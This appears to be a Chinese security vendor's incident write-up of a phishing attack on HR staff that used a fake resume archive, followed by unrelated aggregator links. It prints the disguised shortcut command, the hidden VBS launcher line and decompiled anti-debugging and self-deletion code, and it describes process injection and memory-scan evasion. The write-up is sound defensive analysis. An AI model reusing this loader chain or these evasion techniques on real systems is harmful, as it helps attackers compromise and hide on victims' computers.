钓鱼特辑(四)安全较量,摆脱“麻瓜”标签

时至今日,尽管员工们对网络安全有所了解,却往往因缺乏足够的安全意识而对攻防没有直观感知。在红队看来,普通员工可能犹如“麻瓜”,防御薄弱,易于突破。

现在红队以求职者或合作方等“人畜无害”的身份在日常沟通中发动钓鱼攻击成为了新常态,一来可信度更高,二来更容易让人放下戒备。于是,HR跟财务人员就成为了红队高频“关照”的对象。

近期,某知名制造业企业HR又收到了来自红队“求职者”的简历,显示名为「陈梓锋-华南理工大学-硕士」的压缩文件,立马被亿格云枢EDR检测到并触发告警,企业安全团队在亿格云安全团队的介入下,及时剖析并处置了本次钓鱼攻击,经分析,本次钓鱼攻击使用了多款远控C2,规避调试器、规避内存扫描等,对抗技术丰富。

攻击者假冒求职者,发送含有木马病毒的压缩包,企图诱使HR解压并打开其中的「陈梓锋-华南理工大学-硕士.PDF」文件。一旦HR不慎操作,远控木马便会迅速感染其计算机并执行渗透。

可以清晰看到,实际上该压缩包里有个隐藏文件:

其中的陈锌锋-华南理工大学-硕士.pdf的文件实际是一个快捷方式,HR如双击此快捷方式便会在本地执行命令:

C:\Windows\System32\cscript.exe ".\__MACOSX\.DOCX\aaa.vbs" && exit

此vbs脚本文件核心代码如下:

newMainPath = currentPath & "\__MACOSX\.DOCX\main.exe"WshShell.Run Chr(34) & newMainPath & Chr(34), 0, False

main.exe来源于里面的隐藏文件夹。

图片

main.exe运行后通过进程PEB结构里的标志和硬件断点寄存器判断本进程是否是调试状态。

_BOOL8 DetectDebugger1(){  return NtCurrentPeb()->BeingDebugged == 1;}
_BOOL8 DetectDebugger2(){  HMODULE ModuleHandleW; // rax  HANDLE CurrentThread; // rax  BOOL (__stdcall *GetThreadContext)(HANDLE, LPCONTEXT); // [rsp+20h] [rbp-4F8h]  _CONTEXT Context; // [rsp+30h] [rbp-4E8h] BYREF
  Context.P1Home = 0x100010i64;  memset(&Context.P2Home, 0, 0x4C8ui64);  ModuleHandleW = GetModuleHandleW(ModuleName);  GetThreadContext = GetProcAddress(ModuleHandleW, ProcName);  CurrentThread = GetCurrentThread();  if ( !(GetThreadContext)(CurrentThread, &Context) )    return 0i64;  return Context.Dr0 || Context.Dr1 || Context.Dr2 || Context.Dr3;}

随后便会利用NTFS Alternate Data Stream技术强制删除自身文件,安全人员难以取证。

SetFileInformationByHandle(hFile, FileRenameInfo, pRename, sRename);hFile = CreateFileW(szPath, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL,                      OPEN_EXISTING, NULL, NULL);SetFileInformationByHandle(hFile, FileDispositionInfo, &Delete,                                  sizeof(Delete);

之后再利用线程劫持技术注入shellcode到svchost系统进程内。

图片

shellcode使用了类似sleep mask的技术,来规避内存扫描,sleep mask目前可分为两种实现方式:一种是服务端额外下发一段shellcode专门作为加解密;另一种是在本身的shellcode内就实现了加解密。

此样本如下图所示,为第一种情况,由前面一块shellcode定时解密下一块shellcode:

图片

相关解密代码如下图:

图片

解密后,亿格云安全团队定位到此类远控是CobaltStrike(一款商业C2)木马。不仅如此,攻击者同时还使用了另一款开源C2(Havoc),这个C2的代码是直接在main.exe中运行的。

遇到此类木马,无需过分担忧,因为亿格云枢EDR能够有效防范此类攻击,以下为部分真实告警:

图片

图片

图片

图片

图片

图片

亿格云枢EDR结合先进的恶意文件扫描引擎、内存扫描引擎,行为检测引擎,有效应对大部分旨在规避传统安全检测的攻击,构建了一个多维度的检测与响应机制,从而为企业筑起了一道坚固的防线,抵御钓鱼攻击等网络安全威胁,保护企业数据和资产。

IOC 文件与哈希

陈梓锋-华南理工大学-硕士.pdf.lnk

98229c6abb39197ef38b9d273a74bdfcf25cdee61c69b14b4950dc55d821e95a

main.exe

71f409086f2c11bc9736d54810300bd3d5ea8e35f1f8610ca164440deb828de5

IOC 域名

nginx-imfi.fcv3.1197883384467965.cn-hangzhou.fc.devsapp.net

参考

https://github.com/HavocFramework/Havoc

https://xz.aliyun.com/t/13045?time__1311=GqmhBKYIxfxGx0HQ1YD8tGODgjOzddAex

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/52863.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Windows中pip换源

step1:检查是否安装 输入如下,出现版本号,就是安装好了 pip -V或pip --version pip3 -V pip3 --version step2:找到(创建)配置文件 对于 Windows 用户,配置文件在【%APPDATA%\pip\pip.ini】文…

AutoGen ConversableAgent 基类解析

目录 一、ConversableAgent 类 二、主要函数 1.1 __init__ 1.2 initiate_chat 本文主要对 AutoGen 代理的基类 ConversableAgent 进行介绍。 一、ConversableAgent 类 ConversableAgent 类是代理的基类,AssistantAgent 和 UserProxyAgent 是该类的子类&#x…

使用LinkedHashMap实现固定大小的LRU缓存

使用LinkedHashMap实现固定大小的LRU缓存 1. 什么是LRU? LRU是"Least Recently Used"的缩写,意为"最近最少使用"。LRU缓存是一种常用的缓存淘汰算法,它的核心思想是:当缓存满时,优先淘汰最近最少…

PTA L1-030 一帮一

L1-030 一帮一(15分) “一帮一学习小组”是中小学中常见的学习组织方式,老师把学习成绩靠前的学生跟学习成绩靠后的学生排在一组。本题就请你编写程序帮助老师自动完成这个分配工作,即在得到全班学生的排名后,在当前尚…

Mac下的压缩包和Win看到的不一样怎么办 Mac压缩后Win电脑看文件名会乱码

在当今多平台的数字工作环境中,Mac和Windows用户常常需要交换文件,但有时候会遇到一些兼容性问题。特别是在处理压缩文件时,Mac用户创建的压缩包在Windows系统中打开时,常常会遇到文件名乱码的问题。本文将详细讨论“Mac下的压缩包…

C语言基础(二十八)

1、冒泡排序&#xff1a; #include "date.h" #include <stdio.h> #include <stdlib.h> #include <time.h> // 函数声明 void bubbleSort(int *arr, int n); int* createRandomArray(int n, int *size); int main() { int time getTi…

Java算法之梳排序(Comb Sort)

梳排序简介 梳排序&#xff08;Comb Sort&#xff09;是冒泡排序的一个变种&#xff0c;其核心思想是在比较相邻元素之前先进行更大步长的比较。这种算法的名称来源于其工作方式类似于梳头发时的动作&#xff0c;先大范围地移动&#xff0c;然后逐渐减小移动的步长&#xff0c…

22行为型设计模式——解释器模式

一、解释器模式 解释器模式&#xff08;Interpreter Pattern&#xff09;是一种行为型设计模式&#xff0c;主要用于解析和解释特定的语言或表达式。它的核心思想是为语言中的每种语法规则定义一个解释器&#xff0c;通过这些解释器将语言的表示形式转换为可执行的操作。解释器…

双臂机器人协作/合作阻抗建模及其控制实现(Dual-Arm Cooperative)

机器人阻抗控制是一种基于力的控制方法,其核心在于通过调整机器人的阻抗特性(如刚度、阻尼等),使机器人在与环境交互时能够表现出特定的力学行为。以下是对机器人阻抗控制的详细解析: 一、定义与内涵 机器人阻抗控制是指通过调整机器人的阻抗特性(如刚度、阻尼等),使…

【Python机器学习】NLP词频背后的含义——距离和相似度

我们可以使用相似度评分&#xff08;和距离&#xff09;&#xff0c;根据两篇文档的表示向量间的相似度&#xff08;或距离&#xff09;来判断文档间有多相似。 我们可以使用相似度评分&#xff08;和举例&#xff09;来查看LSA主题模型与高维TF-IDF模型之间的一致性。在去掉了…

697.数组的度

697.数组的度 给定一个非空且只包含非负数的整数数组 nums&#xff0c;数组的 度 的定义是指数组里任一元素出现频数的最大值。 你的任务是在 nums 中找到与 nums 拥有相同大小的度的最短连续子数组&#xff0c;返回其长度。 示例 1&#xff1a; 输入&#xff1a;nums [1,2,2…

STM32基于HAL库串口printf使用和接收

我们这里使用HAL库直接用cubemx生成代码配置串口 1.打开cubemx&#xff0c;选择MCU型号 2.我这里使用的是STM32F103C8T6&#xff0c;根据自己的型号选择&#xff0c;这里不限制型号 3.选择时钟源 4.系统设置 5时钟配置 5.选择和配置串口 5.配置中断和中断优先级 6.工程设置…

【时时三省】c语言例题----华为机试题<最长回文子串>

山不在高&#xff0c;有仙则名。水不在深&#xff0c;有龙则灵。 ----CSDN 时时三省 1&#xff0c;题目 HJ85 最长回文子串 描述 给定一个仅包含小写字母的字符串&#xff0c;求它的最长回文子串的长度。 所谓回文串&#xff0c;指左右对称的字符串。 所谓子串&#xff0…

二叉搜索树的最近公共祖先:递归与迭代解法全面解析

在本篇文章中&#xff0c;我们将详细解读力扣第235题“二叉搜索树的最近公共祖先”。通过学习本篇文章&#xff0c;读者将掌握如何在二叉搜索树中找到两个节点的最近公共祖先&#xff0c;并了解相关的复杂度分析和模拟面试问答。每种方法都将配以详细的解释&#xff0c;以便于理…

代码随想录算法训练营第三十一天|56. 合并区间 738.单调递增的数字

56. 合并区间 题目&#xff1a; 以数组 intervals 表示若干个区间的集合&#xff0c;其中单个区间为 intervals[i] [starti, endi] 。请你合并所有重叠的区间&#xff0c;并返回 一个不重叠的区间数组&#xff0c;该数组需恰好覆盖输入中的所有区间 。 示例 1&#xff1a; 输…

MySQL数据库事务的学习(有业务场景案例)

一、事务的基本概念 定义&#xff1a;事务是数据库管理系统执行过程中的一个逻辑单位&#xff0c;由一个或多个SQL语句组成&#xff0c;这些语句作为一个整体一起向系统提交&#xff0c;要么全部执行&#xff0c;要么全部不执行。 二、ACID特性详解 1. 原子性&#xff08;At…

node环境安装、vue-cli搭建过程、element-UI搭建使用过程

vue-cli 官方提供的一个脚手架&#xff0c;用于快速生成一个 vue 的项目模板&#xff1b;预先定义好的目录结构及基础代码&#xff0c;就好比咱们在创建 Maven 项目时可以选择创建一个骨架项目&#xff0c;这个骨架项目就是脚手架&#xff0c;我们的开发更加的快速 前端项目架…

探索Python测试的奥秘:nose库的魔法之旅

文章目录 探索Python测试的奥秘&#xff1a;nose库的魔法之旅1. 背景&#xff1a;为什么要用nose&#xff1f;2. nose是什么&#xff1f;3. 如何安装nose&#xff1f;4. 五个简单的库函数使用方法4.1 nose.tools.assert_true4.2 nose.tools.assert_equal4.3 nose.tools.raises4…

html2canvas、pdf-lib、file-saver将html页面导出成pdf

html2canvas、pdf-lib、file-saver将html页面导出成pdf 项目背景 需要根据用户的账号信息&#xff0c;生成一个pdf报告发给客户&#xff0c;要求报告包含echart饼图、走势图等。 方案 使用html2canvas&#xff0c;将页面转成图片&#xff0c;再通过pdf-lib将图片转成pdf文件…

Visual Studio Code离线汉化

从官网下载Visual Studio Code安装包后&#xff0c; 下载Visual Studio Code&#xff1a;https://code.visualstudio.com/ 若因网络等问题无法在线安装语言包&#xff0c;可以尝试离线安装&#xff1a; 从官网下载语言包&#xff1a; Extensions for Visual Studio family …